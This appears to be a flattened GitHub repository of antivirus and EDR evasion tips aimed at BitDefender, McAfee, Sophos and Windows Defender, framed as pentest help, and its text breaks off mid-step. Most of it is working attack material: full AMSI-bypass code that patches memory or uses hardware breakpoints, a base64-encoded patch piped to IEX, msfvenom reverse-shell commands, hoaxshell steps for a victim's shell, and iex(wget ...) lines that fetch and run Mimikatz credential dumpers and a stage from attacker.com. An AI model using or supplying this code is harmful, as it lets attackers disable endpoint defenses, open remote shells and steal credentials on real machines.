[
  {
    "path": "BitDefender Endpoint Security Tool/README.md",
    "content": "# BitDefender\n\n## Using Condor + Powershell Empire\n\nThe [condor](https://github.com/MrEmpy/Condor) tool is also able to bypass BitDefender's EDR, including running Powershell Empire's own tools without any interruption, such as Mimikatz.\n\n1. Open your Powershell Empire and generate a Powershell payload, example:\n\n```\npowershell -Sta -Nop -Window Hidden -EncodedCommand cwB2ACAAbwAgACg...\n```\n\n1. Run the condor tool with the following command:\n\n```\npython3 condor.py -p windows/x64/exec\n```\n\n1. Paste the Powershell payload to generate the shellcode\n\n![](<../BitDefender Endpoint Security Tool/Images/bitdefender2.png>)\n\n1. Upload the EXE to the machine and run.\n\n![](<../BitDefender Endpoint Security Tool/Images/bitdefender.png>)\n"
  },
  {
    "path": "LICENSE",
    "content": "MIT License\n\nCopyright (c) 2022 MrEmpy\n\nPermission is hereby granted, free of charge, to any person obtaining a copy\nof this software and associated documentation files (the \"Software\"), to deal\nin the Software without restriction, including without limitation the rights\nto use, copy, modify, merge, publish, distribute, sublicense, and/or sell\ncopies of the Software, and to permit persons to whom the Software is\nfurnished to do so, subject to the following conditions:\n\nThe above copyright notice and this permission notice shall be included in all\ncopies or substantial portions of the Software.\n\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\nIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\nAUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\nLIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\nOUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\nSOFTWARE.\n"
  },
  {
    "path": "McAfee MVISION/README.md",
    "content": "# McAfee MVISION\n\n## Bypassing using ScareCrow\n\nYou can use the [scarecrow](https://github.com/optiv/ScareCrow) tool to bypass McAfee EDR. We tested 3 types of metasploit payloads that work, they are:\n\n* windows/x64/shell/reverse\\_tcp\n* windows/x64/meterpreter\\_reverse\\_https\n* windows/x64/exec\n\nCommands:\n\n```\n$ msfvenom -p windows/x64/shell/reverse_tcp LHOST=<LHOST> LPORT=<LPORT> -f raw -a x64 -e x64/xor > shellcode.bin \n$ ./ScareCrow_4.11_linux_amd64 -I shellcode.bin -domain microsoft.com \n```\n\nIt obscures itself to circumvent protections and also contains a false signature to give more credibility to the target. ![](https://github.com/optiv/ScareCrow/raw/main/Screenshots/File\\_Attributes.png)\n"
  },
  {
    "path": "README.md",
    "content": "<h1 align=\"center\">「🛡️」Awesome AVs/EDRs/XDRs Bypass Tips</h1>\n\n<p align=\"center\"><img src=\"shield.jpg\"></p>\n\nWelcome to this repository! The purpose of this repository is to gather as many techniques and tools as possible to circumvent AVs, EDRs and XDRs so that it can help you throughout your pentest.\n\nHelp our work by leaving a star in the repository ;)\n\n[Gitbook Here](https://mrempy.gitbook.io/awesome-av-edr-xdr-bypass-tips/readme/windows-defender)\n\n## AV/EDR/XDR Table\n\n| Name | Type | Operating System | XXX | XXX |\n| ----------- | ----------- | ----------- | ----------- | ----------- |\n| [BitDefender Endpoint Security Tool](https://github.com/MrEmpy/Awesome-AV-EDR-XDR-Bypass/tree/main/BitDefender%20Endpoint%20Security%20Tool) | EDR | Windows | XXX | XXX |\n| [McAfee Endpoint Protection](https://github.com/MrEmpy/Awesome-AV-EDR-XDR-Bypass/tree/main/McAfee%20MVISION) | EDR | Windows | XXX | XXX |\n| [Sophos](https://github.com/MrEmpy/Awesome-AV-EDR-XDR-Bypass/tree/main/Sophos) | EDR | Windows | XXX | XXX |\n| [Windows Defender](https://github.com/MrEmpy/Awesome-AV-EDR-XDR-Bypass/tree/main/Windows%20Defender) | Antivirus | Windows | XXX | XXX |\n| [Xcitium Client Security](https://github.com/MrEmpy/Awesome-AV-EDR-XDR-Bypass/tree/main/Xcitium%20Client%20Security) | Antivirus | Windows | XXX | XXX |\n"
  },
  {
    "path": "Sophos/README.md",
    "content": "# Sophos\n\n## Bypassing Sophos Endpoint Protection With Hoaxshell\n\nDownload the hoaxshell in github\n\n```\ngit clone https://github.com/t3l3machus/hoaxshell\ncd ./hoaxshell\nsudo pip3 install -r requirements.txt\nchmod +x hoaxshell.py\n```\n\nCommand:\n\n```\npython3 hoaxshell.py -s SERVER_IP\n```\n\nNow just copy the payload generated by hoaxshell and go to the victim's cmd, now just paste the payload\n\n![](../Sophos/Images/sophoshs.png)\n\n## Execution\n\n![](../Sophos/Images/sophoshs1.png)\n"
  },
  {
    "path": "Windows Defender/README.md",
    "content": "# Windows Defender\n\n## AMSI Bypass\n\nIf you need to run some Powershell command that is being blocked by AMSI, try running this command to get around it:\n\n![](<../Windows Defender/Images/amsi\\_bypass3.png>) https://gist.githubusercontent.com/FatRodzianko/c8a76537b5a87b850c7d158728717998/raw/36103d12eec662d532c9127f2396bc347d13c3c5/my-am-bypass.ps1\n\nYou can base64 encode the command to be one line. Use CyberChef to encode the code to base64.\n\n![](<../Windows Defender/Images/amsi\\_bypass2.png>) CyberChef URL:\n\nhttps://icyberchef.com/#recipe=To\\_Base64('A-Za-z0-9%2B/%3D')\\&input=JFdpbjMyID0gQCIKdXNpbmcgU3lzdGVtOwp1c2luZyBTeXN0ZW0uUnVudGltZS5JbnRlcm9wU2VydmljZXM7CgpwdWJsaWMgY2xhc3MgV2luMzIgewoKICAgIFtEbGxJbXBvcnQoImtlcm5lbDMyIildCiAgICBwdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgR2V0UHJvY0FkZHJlc3MoSW50UHRyIGhNb2R1bGUsIHN0cmluZyBwcm9jTmFtZSk7CgogICAgW0RsbEltcG9ydCgia2VybmVsMzIiKV0KICAgIHB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBMb2FkTGlicmFyeShzdHJpbmcgbmFtZSk7CgogICAgW0RsbEltcG9ydCgia2VybmVsMzIiKV0KICAgIHB1YmxpYyBzdGF0aWMgZXh0ZXJuIGJvb2wgVmlydHVhbFByb3RlY3QoSW50UHRyIGxwQWRkcmVzcywgVUludFB0ciBkd1NpemUsIHVpbnQgZmxOZXdQcm90ZWN0LCBvdXQgdWludCBscGZsT2xkUHJvdGVjdCk7Cgp9CiJACgpBZGQtVHlwZSAkV2luMzIKJHRlc3QgPSBbQnl0ZVtdXSgweDYxLCAweDZkLCAweDczLCAweDY5LCAweDJlLCAweDY0LCAweDZjLCAweDZjKQokTG9hZExpYnJhcnkgPSBbV2luMzJdOjpMb2FkTGlicmFyeShbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpBU0NJSS5HZXRTdHJpbmcoJHRlc3QpKQokdGVzdDIgPSBbQnl0ZVtdXSAoMHg0MSwgMHg2ZCwgMHg3MywgMHg2OSwgMHg1MywgMHg2MywgMHg2MSwgMHg2ZSwgMHg0MiwgMHg3NSwgMHg2NiwgMHg2NiwgMHg2NSwgMHg3MikKJEFkZHJlc3MgPSBbV2luMzJdOjpHZXRQcm9jQWRkcmVzcygkTG9hZExpYnJhcnksIFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OkFTQ0lJLkdldFN0cmluZygkdGVzdDIpKQokcCA9IDAKW1dpbjMyXTo6VmlydHVhbFByb3RlY3QoJEFkZHJlc3MsIFt1aW50MzJdNSwgMHg0MCwgW3JlZl0kcCkKJFBhdGNoID0gW0J5dGVbXV0gKDB4MzEsIDB4QzAsIDB4MDUsIDB4NzgsIDB4MDEsIDB4MTksIDB4N0YsIDB4MDUsIDB4REYsIDB4RkUsIDB4RUQsIDB4MDAsIDB4QzMpCiMwOiAgMzEgYzAgICAgICAgICAgICAgICAgICAgeG9yICAgIGVheCxlYXgKIzI6ICAwNSA3OCAwMSAxOSA3ZiAgICAgICAgICBhZGQgICAgZWF4LDB4N2YxOTAxNzgKIzc6ICAwNSBkZiBmZSBlZCAwMCAgICAgICAgICBhZGQgICAgZWF4LDB4ZWRmZWRmCiNjOiAgYzMgICAgICAgICAgICAgICAgICAgICAgcmV0IApbU3lzdGVtLlJ1bnRpbWUuSW50ZXJvcFNlcnZpY2VzLk1hcnNoYWxdOjpDb3B5KCRQYXRjaCwgMCwgJEFkZHJlc3MsICRQYXRjaC5MZW5ndGgp\n\nCommand:\n\n```\n[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(\"JFdpbjMyID0gQCIKdXNpbmcgU3lzdGVtOwp1c2luZyBTeXN0ZW0uUnVudGltZS5JbnRlcm9wU2VydmljZXM7CgpwdWJsaWMgY2xhc3MgV2luMzIgewoKICAgIFtEbGxJbXBvcnQoImtlcm5lbDMyIildCiAgICBwdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgR2V0UHJvY0FkZHJlc3MoSW50UHRyIGhNb2R1bGUsIHN0cmluZyBwcm9jTmFtZSk7CgogICAgW0RsbEltcG9ydCgia2VybmVsMzIiKV0KICAgIHB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBMb2FkTGlicmFyeShzdHJpbmcgbmFtZSk7CgogICAgW0RsbEltcG9ydCgia2VybmVsMzIiKV0KICAgIHB1YmxpYyBzdGF0aWMgZXh0ZXJuIGJvb2wgVmlydHVhbFByb3RlY3QoSW50UHRyIGxwQWRkcmVzcywgVUludFB0ciBkd1NpemUsIHVpbnQgZmxOZXdQcm90ZWN0LCBvdXQgdWludCBscGZsT2xkUHJvdGVjdCk7Cgp9CiJACgpBZGQtVHlwZSAkV2luMzIKJHRlc3QgPSBbQnl0ZVtdXSgweDYxLCAweDZkLCAweDczLCAweDY5LCAweDJlLCAweDY0LCAweDZjLCAweDZjKQokTG9hZExpYnJhcnkgPSBbV2luMzJdOjpMb2FkTGlicmFyeShbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpBU0NJSS5HZXRTdHJpbmcoJHRlc3QpKQokdGVzdDIgPSBbQnl0ZVtdXSAoMHg0MSwgMHg2ZCwgMHg3MywgMHg2OSwgMHg1MywgMHg2MywgMHg2MSwgMHg2ZSwgMHg0MiwgMHg3NSwgMHg2NiwgMHg2NiwgMHg2NSwgMHg3MikKJEFkZHJlc3MgPSBbV2luMzJdOjpHZXRQcm9jQWRkcmVzcygkTG9hZExpYnJhcnksIFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OkFTQ0lJLkdldFN0cmluZygkdGVzdDIpKQokcCA9IDAKW1dpbjMyXTo6VmlydHVhbFByb3RlY3QoJEFkZHJlc3MsIFt1aW50MzJdNSwgMHg0MCwgW3JlZl0kcCkKJFBhdGNoID0gW0J5dGVbXV0gKDB4MzEsIDB4QzAsIDB4MDUsIDB4NzgsIDB4MDEsIDB4MTksIDB4N0YsIDB4MDUsIDB4REYsIDB4RkUsIDB4RUQsIDB4MDAsIDB4QzMpCiMwOiAgMzEgYzAgICAgICAgICAgICAgICAgICAgeG9yICAgIGVheCxlYXgKIzI6ICAwNSA3OCAwMSAxOSA3ZiAgICAgICAgICBhZGQgICAgZWF4LDB4N2YxOTAxNzgKIzc6ICAwNSBkZiBmZSBlZCAwMCAgICAgICAgICBhZGQgICAgZWF4LDB4ZWRmZWRmCiNjOiAgYzMgICAgICAgICAgICAgICAgICAgICAgcmV0IApbU3lzdGVtLlJ1bnRpbWUuSW50ZXJvcFNlcnZpY2VzLk1hcnNoYWxdOjpDb3B5KCRQYXRjaCwgMCwgJEFkZHJlc3MsICRQYXRjaC5MZW5ndGgp\")) | IEX\n```\n\n### Execution\n\n![](<../Windows Defender/Images/amsi\\_bypass1.png>)\n\n## Defeating Windows Defender & Bypassing Amsi And Running Mimikatz\n\n### Execution\n\n![](<../Windows Defender/Images/wd+amsi\\_bypass\\_mimikatz.png>)\n\nCommand:\n\n```\niex(wget https://gist.github.com/pich4ya/e93abe76d97bd1cf67bfba8dce9c0093/raw/e32760420ae642123599b6c9c2fddde2ecaf7a2b/Invoke-OneShot-Mimikatz.ps1 -UseBasicParsing)\n```\n\n## AMSI Bypass Using Hardware Breakpoints (by [EthicalChaos](https://twitter.com/_EthicalChaos))\n\n```\n$HardwareBreakpoint = @\"\n// Technique from @_EthicalChaos_ (https://twitter.com/_EthicalChaos_)\n// Original Code by @d_tranman: https://twitter.com/d_tranman/status/1628954053115002881\n// Slight modifications by @ShitSecure for Powershell runtime compitability as the original code could not be used like this. Also the removal of the Hardware breakpoint was removed, so that every following future Powershell command bypasses AMSI as well.\n\nusing System;\nusing System.Collections.Generic;\nusing System.Linq.Expressions;\nusing System.Linq;\nusing System.Runtime.CompilerServices;\nusing System.Net;\nusing System.Reflection;\nusing System.Runtime.InteropServices;\n\nnamespace Test\n{\n    // CCOB IS THE GOAT\n   \n    public class Program\n    {\n        static string a = \"msi\";\n        static string b = \"anB\";\n        static string c = \"ff\";\n        static IntPtr BaseAddress = WinAPI.LoadLibrary(\"a\" + a + \".dll\");\n        static IntPtr pABuF = WinAPI.GetProcAddress(BaseAddress, \"A\" + a + \"Sc\" + b + \"u\" + c + \"er\");\n        static IntPtr pCtx = Marshal.AllocHGlobal(Marshal.SizeOf(typeof(WinAPI.CONTEXT64)));\n        \n        public static void SetupBypass()\n        {\n\n            WinAPI.CONTEXT64 ctx = new WinAPI.CONTEXT64();\n            ctx.ContextFlags = WinAPI.CONTEXT64_FLAGS.CONTEXT64_ALL;\n\n            MethodInfo method = typeof(Program).GetMethod(\"Handler\", BindingFlags.Static | BindingFlags.Public);\n            IntPtr hExHandler = WinAPI.AddVectoredExceptionHandler(1, method.MethodHandle.GetFunctionPointer());\n            \n            // Saving our context to a struct\n            Marshal.StructureToPtr(ctx, pCtx, true);\n            bool b = WinAPI.GetThreadContext((IntPtr)(-2), pCtx);\n            ctx = (WinAPI.CONTEXT64)Marshal.PtrToStructure(pCtx, typeof(WinAPI.CONTEXT64));\n\n            EnableBreakpoint(ctx, pABuF, 0);\n\n            WinAPI.SetThreadContext((IntPtr)(-2), pCtx);\n\n        }\n        \n        public static long Handler(IntPtr exceptions)\n        {\n            WinAPI.EXCEPTION_POINTERS ep = new WinAPI.EXCEPTION_POINTERS();\n            ep = (WinAPI.EXCEPTION_POINTERS)Marshal.PtrToStructure(exceptions, typeof(WinAPI.EXCEPTION_POINTERS));\n\n            WinAPI.EXCEPTION_RECORD ExceptionRecord = new WinAPI.EXCEPTION_RECORD();\n            ExceptionRecord = (WinAPI.EXCEPTION_RECORD)Marshal.PtrToStructure(ep.pExceptionRecord, typeof(WinAPI.EXCEPTION_RECORD));\n\n            WinAPI.CONTEXT64 ContextRecord = new WinAPI.CONTEXT64();\n            ContextRecord = (WinAPI.CONTEXT64)Marshal.PtrToStructure(ep.pContextRecord, typeof(WinAPI.CONTEXT64));\n\n            if (ExceptionRecord.ExceptionCode == WinAPI.EXCEPTION_SINGLE_STEP && ExceptionRecord.ExceptionAddress == pABuF)\n            {\n                ulong ReturnAddress = (ulong)Marshal.ReadInt64((IntPtr)ContextRecord.Rsp);\n\n                // THE OUTPUT AMSIRESULT IS A POINTER, NOT THE EXPLICIT VALUE AAAAAAAAAA\n                IntPtr ScanResult = Marshal.ReadIntPtr((IntPtr)(ContextRecord.Rsp + (6 * 8))); // 5th arg, swap it to clean\n                //Console.WriteLine(\"Buffer: 0x{0:X}\", (long)ContextRecord.R8);\n                //Console.WriteLine(\"Scan Result: 0x{0:X}\", Marshal.ReadInt32(ScanResult));\n\n                Marshal.WriteInt32(ScanResult, 0, WinAPI.AMSI_RESULT_CLEAN);\n\n                ContextRecord.Rip = ReturnAddress;\n                ContextRecord.Rsp += 8;\n                ContextRecord.Rax = 0; // S_OK\n                \n                Marshal.StructureToPtr(ContextRecord, ep.pContextRecord, true); //Paste our altered ctx back in TO THE RIGHT STRUCT\n                return WinAPI.EXCEPTION_CONTINUE_EXECUTION;\n            }\n            else\n            {\n                return WinAPI.EXCEPTION_CONTINUE_SEARCH;\n            }\n\n        }\n        public static void EnableBreakpoint(WinAPI.CONTEXT64 ctx, IntPtr address, int index)\n        {\n\n            switch (index)\n            {\n                case 0:\n                    ctx.Dr0 = (ulong)address.ToInt64();\n                    break;\n                case 1:\n                    ctx.Dr1 = (ulong)address.ToInt64();\n                    break;\n                case 2:\n                    ctx.Dr2 = (ulong)address.ToInt64();\n                    break;\n                case 3:\n                    ctx.Dr3 = (ulong)address.ToInt64();\n                    break;\n            }\n\n            //Set bits 16-31 as 0, which sets\n            //DR0-DR3 HBP's for execute HBP\n            ctx.Dr7 = SetBits(ctx.Dr7, 16, 16, 0);\n\n            //Set DRx HBP as enabled for local mode\n            ctx.Dr7 = SetBits(ctx.Dr7, (index * 2), 1, 1);\n            ctx.Dr6 = 0;\n\n            // Now copy the changed ctx into the original struct\n            Marshal.StructureToPtr(ctx, pCtx, true);\n        }\n        public static ulong SetBits(ulong dw, int lowBit, int bits, ulong newValue)\n        {\n            ulong mask = (1UL << bits) - 1UL;\n            dw = (dw & ~(mask << lowBit)) | (newValue << lowBit);\n            return dw;\n        }\n    }\n    public class WinAPI\n    {\n        public const UInt32 DBG_CONTINUE = 0x00010002;\n        public const UInt32 DBG_EXCEPTION_NOT_HANDLED = 0x80010001;\n        public const Int32 EXCEPTION_CONTINUE_EXECUTION = -1;\n        public const Int32 EXCEPTION_CONTINUE_SEARCH = 0;\n        public const Int32 CREATE_PROCESS_DEBUG_EVENT = 3;\n        public const Int32 CREATE_THREAD_DEBUG_EVENT = 2;\n        public const Int32 EXCEPTION_DEBUG_EVENT = 1;\n        public const Int32 EXIT_PROCESS_DEBUG_EVENT = 5;\n        public const Int32 EXIT_THREAD_DEBUG_EVENT = 4;\n        public const Int32 LOAD_DLL_DEBUG_EVENT = 6;\n        public const Int32 OUTPUT_DEBUG_STRING_EVENT = 8;\n        public const Int32 RIP_EVENT = 9;\n        public const Int32 UNLOAD_DLL_DEBUG_EVENT = 7;\n\n        public const UInt32 EXCEPTION_ACCESS_VIOLATION = 0xC0000005;\n        public const UInt32 EXCEPTION_BREAKPOINT = 0x80000003;\n        public const UInt32 EXCEPTION_DATATYPE_MISALIGNMENT = 0x80000002;\n        public const UInt32 EXCEPTION_SINGLE_STEP = 0x80000004;\n        public const UInt32 EXCEPTION_ARRAY_BOUNDS_EXCEEDED = 0xC000008C;\n        public const UInt32 EXCEPTION_INT_DIVIDE_BY_ZERO = 0xC0000094;\n        public const UInt32 DBG_CONTROL_C = 0x40010006;\n        public const UInt32 DEBUG_PROCESS = 0x00000001;\n        public const UInt32 CREATE_SUSPENDED = 0x00000004;\n        public const UInt32 CREATE_NEW_CONSOLE = 0x00000010;\n\n        public const Int32 AMSI_RESULT_CLEAN = 0;\n\n        [DllImport(\"kernel32.dll\", SetLastError = true)]\n        public static extern bool SetThreadContext(IntPtr hThread, IntPtr lpContext);\n        [DllImport(\"kernel32.dll\", SetLastError = true)]\n        public static extern bool GetThreadContext(IntPtr hThread, IntPtr lpContext);\n        [DllImport(\"kernel32.dll\", SetLastError = true)]\n        public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);\n        [DllImport(\"kernel32\", SetLastError = true, CharSet = CharSet.Ansi)]\n        public static extern IntPtr LoadLibrary([MarshalAs(UnmanagedType.LPStr)] string lpFileName);\n\n        [DllImport(\"Kernel32.dll\")]\n        public static extern IntPtr AddVectoredExceptionHandler(uint First, IntPtr Handler);\n        [Flags]\n        public enum CONTEXT64_FLAGS : uint\n        {\n            CONTEXT64_AMD64 = 0x100000,\n            CONTEXT64_CONTROL = CONTEXT64_AMD64 | 0x01,\n            CONTEXT64_INTEGER = CONTEXT64_AMD64 | 0x02,\n            CONTEXT64_SEGMENTS = CONTEXT64_AMD64 | 0x04,\n            CONTEXT64_FLOATING_POINT = CONTEXT64_AMD64 | 0x08,\n            CONTEXT64_DEBUG_REGISTERS = CONTEXT64_AMD64 | 0x10,\n            CONTEXT64_FULL = CONTEXT64_CONTROL | CONTEXT64_INTEGER | CONTEXT64_FLOATING_POINT,\n            CONTEXT64_ALL = CONTEXT64_CONTROL | CONTEXT64_INTEGER | CONTEXT64_SEGMENTS | CONTEXT64_FLOATING_POINT | CONTEXT64_DEBUG_REGISTERS\n        }\n        [StructLayout(LayoutKind.Sequential)]\n        public struct M128A\n        {\n            public ulong High;\n            public long Low;\n\n            public override string ToString()\n            {\n                return string.Format(\"High:{0}, Low:{1}\", this.High, this.Low);\n            }\n        }\n\n        /// <summary>\n        /// x64\n        /// </summary>\n        [StructLayout(LayoutKind.Sequential, Pack = 16)]\n        public struct XSAVE_FORMAT64\n        {\n            public ushort ControlWord;\n            public ushort StatusWord;\n            public byte TagWord;\n            public byte Reserved1;\n            public ushort ErrorOpcode;\n            public uint ErrorOffset;\n            public ushort ErrorSelector;\n            public ushort Reserved2;\n            public uint DataOffset;\n            public ushort DataSelector;\n            public ushort Reserved3;\n            public uint MxCsr;\n            public uint MxCsr_Mask;\n\n            [MarshalAs(UnmanagedType.ByValArray, SizeConst = 8)]\n            public M128A[] FloatRegisters;\n\n            [MarshalAs(UnmanagedType.ByValArray, SizeConst = 16)]\n            public M128A[] XmmRegisters;\n\n            [MarshalAs(UnmanagedType.ByValArray, SizeConst = 96)]\n            public byte[] Reserved4;\n        }\n\n        /// <summary>\n        /// x64\n        /// </summary>\n        [StructLayout(LayoutKind.Sequential, Pack = 16)]\n        public struct CONTEXT64\n        {\n            public ulong P1Home;\n            public ulong P2Home;\n            public ulong P3Home;\n            public ulong P4Home;\n            public ulong P5Home;\n            public ulong P6Home;\n\n            public CONTEXT64_FLAGS ContextFlags;\n            public uint MxCsr;\n\n            public ushort SegCs;\n            public ushort SegDs;\n            public ushort SegEs;\n            public ushort SegFs;\n            public ushort SegGs;\n            public ushort SegSs;\n            public uint EFlags;\n\n            public ulong Dr0;\n            public ulong Dr1;\n            public ulong Dr2;\n            public ulong Dr3;\n            public ulong Dr6;\n            public ulong Dr7;\n\n            public ulong Rax;\n            public ulong Rcx;\n            public ulong Rdx;\n            public ulong Rbx;\n            public ulong Rsp;\n            public ulong Rbp;\n            public ulong Rsi;\n            public ulong Rdi;\n            public ulong R8;\n            public ulong R9;\n            public ulong R10;\n            public ulong R11;\n            public ulong R12;\n            public ulong R13;\n            public ulong R14;\n            public ulong R15;\n            public ulong Rip;\n\n            public XSAVE_FORMAT64 DUMMYUNIONNAME;\n\n            [MarshalAs(UnmanagedType.ByValArray, SizeConst = 26)]\n            public M128A[] VectorRegister;\n            public ulong VectorControl;\n\n            public ulong DebugControl;\n            public ulong LastBranchToRip;\n            public ulong LastBranchFromRip;\n            public ulong LastExceptionToRip;\n            public ulong LastExceptionFromRip;\n        }\n        [StructLayout(LayoutKind.Sequential)]\n        public struct EXCEPTION_RECORD\n        {\n            public uint ExceptionCode;\n            public uint ExceptionFlags;\n            public IntPtr ExceptionRecord;\n            public IntPtr ExceptionAddress;\n            public uint NumberParameters;\n            [MarshalAs(UnmanagedType.ByValArray, SizeConst = 15, ArraySubType = UnmanagedType.U4)] public uint[] ExceptionInformation;\n        }\n        [StructLayout(LayoutKind.Sequential)]\n        public struct EXCEPTION_POINTERS\n        {\n            public IntPtr pExceptionRecord;\n            public IntPtr pContextRecord;\n        }\n    }\n}\n\n\n\"@\n\nAdd-Type -TypeDefinition $HardwareBreakpoint\n\n[Test.Program]::SetupBypass()\n```\n\n## AMSI Bypass (by [am0nsec](https://twitter.com/am0nsec))\n\n```\nWrite-Host \"-- AMSI Patch\"\nWrite-Host \"-- Paul Laîné (@am0nsec)\"\nWrite-Host \"\"\n\n$Kernel32 = @\"\nusing System;\nusing System.Runtime.InteropServices;\n\npublic class Kernel32 {\n    [DllImport(\"kernel32\")]\n    public static extern IntPtr GetProcAddress(IntPtr hModule, string lpProcName);\n\n    [DllImport(\"kernel32\")]\n    public static extern IntPtr LoadLibrary(string lpLibFileName);\n\n    [DllImport(\"kernel32\")]\n    public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);\n}\n\"@\n\nAdd-Type $Kernel32\n\nClass Hunter {\n    static [IntPtr] FindAddress([IntPtr]$address, [byte[]]$egg) {\n        while ($true) {\n            [int]$count = 0\n\n            while ($true) {\n                [IntPtr]$address = [IntPtr]::Add($address, 1)\n                If ([System.Runtime.InteropServices.Marshal]::ReadByte($address) -eq $egg.Get($count)) {\n                    $count++\n                    If ($count -eq $egg.Length) {\n                        return [IntPtr]::Subtract($address, $egg.Length - 1)\n                    }\n                } Else { break }\n            }\n        }\n\n        return $address\n    }\n}\n\n[IntPtr]$hModule = [Kernel32]::LoadLibrary(\"amsi.dll\")\nWrite-Host \"[+] AMSI DLL Handle: $hModule\"\n\n[IntPtr]$dllCanUnloadNowAddress = [Kernel32]::GetProcAddress($hModule, \"DllCanUnloadNow\")\nWrite-Host \"[+] DllCanUnloadNow address: $dllCanUnloadNowAddress\"\n\nIf ([IntPtr]::Size -eq 8) {\n\tWrite-Host \"[+] 64-bits process\"\n    [byte[]]$egg = [byte[]] (\n        0x4C, 0x8B, 0xDC,       # mov     r11,rsp\n        0x49, 0x89, 0x5B, 0x08, # mov     qword ptr [r11+8],rbx\n        0x49, 0x89, 0x6B, 0x10, # mov     qword ptr [r11+10h],rbp\n        0x49, 0x89, 0x73, 0x18, # mov     qword ptr [r11+18h],rsi\n        0x57,                   # push    rdi\n        0x41, 0x56,             # push    r14\n        0x41, 0x57,             # push    r15\n        0x48, 0x83, 0xEC, 0x70  # sub     rsp,70h\n    )\n} Else {\n\tWrite-Host \"[+] 32-bits process\"\n    [byte[]]$egg = [byte[]] (\n        0x8B, 0xFF,             # mov     edi,edi\n        0x55,                   # push    ebp\n        0x8B, 0xEC,             # mov     ebp,esp\n        0x83, 0xEC, 0x18,       # sub     esp,18h\n        0x53,                   # push    ebx\n        0x56                    # push    esi\n    )\n}\n[IntPtr]$targetedAddress = [Hunter]::FindAddress($dllCanUnloadNowAddress, $egg)\nWrite-Host \"[+] Targeted address: $targetedAddress\"\n\n$oldProtectionBuffer = 0\n[Kernel32]::VirtualProtect($targetedAddress, [uint32]2, 4, [ref]$oldProtectionBuffer) | Out-Null\n\n$patch = [byte[]] (\n    0x31, 0xC0,    # xor rax, rax\n    0xC3           # ret  \n)\n[System.Runtime.InteropServices.Marshal]::Copy($patch, 0, $targetedAddress, 3)\n\n$a = 0\n[Kernel32]::VirtualProtect($targetedAddress, [uint32]2, $oldProtectionBuffer, [ref]$a) | Out-Null\n```\n\n## Using condor tool + AMSI bypass + Covenant C2\n\nThe [condor](https://github.com/MrEmpy/Condor) tool is used for evasion of protection like AVs/EDRs/XDRs. You can use it to combo an AMSI bypass and a C2 like Covenant.\n\n1. On the attacker's machine, create a folder where there will be two powershell scripts, one to bypass AMSI and another for the target to connect with C2.\n\nbypass.ps1\n\n```\n# TLDR:\n# iex(wget https://gist.githubusercontent.com/pich4ya/e93abe76d97bd1cf67bfba8dce9c0093/raw/4cee3d04127ca304bb04c9d95f3146eb7e9985a8/Invoke-OneShot-Mimikatz.ps1 -UseBasicParsing)\n#\n# @author Pichaya Morimoto (p.morimoto@sth.sh)\n# One Shot for M1m1katz PowerShell Dump All Creds with AMSI Bypass 2022 Edition\n# (Tested and worked on Windows 10 x64 patched 2022-03-26)\n#\n# Usage:\n# 1. You need a local admin user's powershell with Medium Mandatory Level (whoami /all)\n# 2. iex(wget https://gist.githubusercontent.com/pich4ya/e93abe76d97bd1cf67bfba8dce9c0093/raw/4cee3d04127ca304bb04c9d95f3146eb7e9985a8/Invoke-OneShot-Mimikatz.ps1 -UseBasicParsing)\n# or\n# iex(wget https://attacker-local-ip/Invoke-OneShot-Mimikatz.ps1 -UseBasicParsing)\n#\n# AMSI Bypass is copied from payatu's AMSI-Bypass (23-August-2021)\n# https://payatu.com/blog/arun.nair/amsi-bypass\n$code = @\"\nusing System;\nusing System.Runtime.InteropServices;\npublic class WinApi {\n\n        [DllImport(\"kernel32\")]\n        public static extern IntPtr LoadLibrary(string name);\n\n        [DllImport(\"kernel32\")]\n        public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);\n\n        [DllImport(\"kernel32\")]\n        public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out int lpflOldProtect);\n\n}\n\"@\n\nAdd-Type $code\n\n$amsiDll = [WinApi]::LoadLibrary(\"amsi.dll\")\n$asbAddr = [WinApi]::GetProcAddress($amsiDll, \"Ams\"+\"iScan\"+\"Buf\"+\"fer\")\n$ret = [Byte[]] ( 0xc3, 0x80, 0x07, 0x00,0x57, 0xb8 )\n$out = 0\n\n[WinApi]::VirtualProtect($asbAddr, [uint32]$ret.Length, 0x40, [ref] $out)\n[System.Runtime.InteropServices.Marshal]::Copy($ret, 0, $asbAddr, $ret.Length)\n[WinApi]::VirtualProtect($asbAddr, [uint32]$ret.Length, $out, [ref] $null)\n\n\n# nishang - 2.2.0 (Jul 24, 2021)\n# Change this to \"attacker-local-ip\" for internal sources\n\niex(wget http://attacker.com/exec.ps1 -UseBasicParsing)\n```\n\n[Reference](https://gist.github.com/pich4ya/e93abe76d97bd1cf67bfba8dce9c0093)\n\nOn the last line where there is the `wget` command, put the IP of the attacker's machine where it will contain the two files (bypass.ps1 and exec.ps1)\n\n1. Go to Covenant and generate a powershell payload\n\n![](<../Windows Defender/Images/genpscovenant1.png>)\n\n![](<../Windows Defender/Images/genpscovenant2.png>)\n\nThe payload will look like this:\n\nexec.ps1\n\n```\nsv o (New-Object IO.MemoryStream);sv d (New-Object IO.Compression.DeflateStream([IO.MemoryStream][Convert]::FromBase64String('7Vp7cFzle...\n```\n\n1. Now create a file called exec.ps1 and paste the modified payload\n2. 